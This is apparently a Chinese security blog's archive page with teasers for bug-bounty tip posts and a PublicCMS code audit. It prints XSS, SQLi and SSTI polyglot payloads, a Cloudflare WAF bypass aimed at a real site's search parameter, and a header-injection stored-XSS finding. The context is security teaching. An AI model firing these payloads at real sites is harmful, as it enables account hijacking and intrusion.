2019年09月的内容

未分类

bugbountytip#2

bugbountytip#2
SQLi + XSS + SSTI payload '"><svg/onload=prompt(5);>{{7*7}}   XSS { Cloudfare } bypass: backblaze.com/blog/?s=</> " <a+HREF='%26%237javascrip%26%239t:alert%26lpar;document.domain)'> " ……继续阅读 »

Admin 10个月前 (09-26) 180浏览 0个赞

未分类

bugbountytip#1

bugbountytip#1
1、SQL注入判断数据库类型 MySQL,MSSQL和Oracle为此分别具有不同的功能now(),getdate()和sysdate() 2、xss payload <video onloadstart="alert(1)"><source> 在firefox生效,chrome无效 <img/src="#"/onloadstart="alert(1)"/onloadend="aler……继续阅读 »

Admin 10个月前 (09-25) 265浏览 0个赞

未分类

JAVA代码审计-PublicCMS-01

JAVA代码审计-PublicCMS-01
系统搭建好后,进入后台发现有登录日志记录,会记录登录成功/失败的用户ip、错误密码等信息 先看看是否存在xss   可以看到ip是从 X-Real-IP X-Forwarded-For 两个请求头中获取的,可以通过抓包伪造请求头插入非法字符,并且未做过滤写入到数据库中   直接查看数据库表中的内容,发现没有转义   但是输出的时候却被转义了   从技术架构了解到使用了f……继续阅读 »

Admin 10个月前 (09-03) 368浏览 0评论 0个赞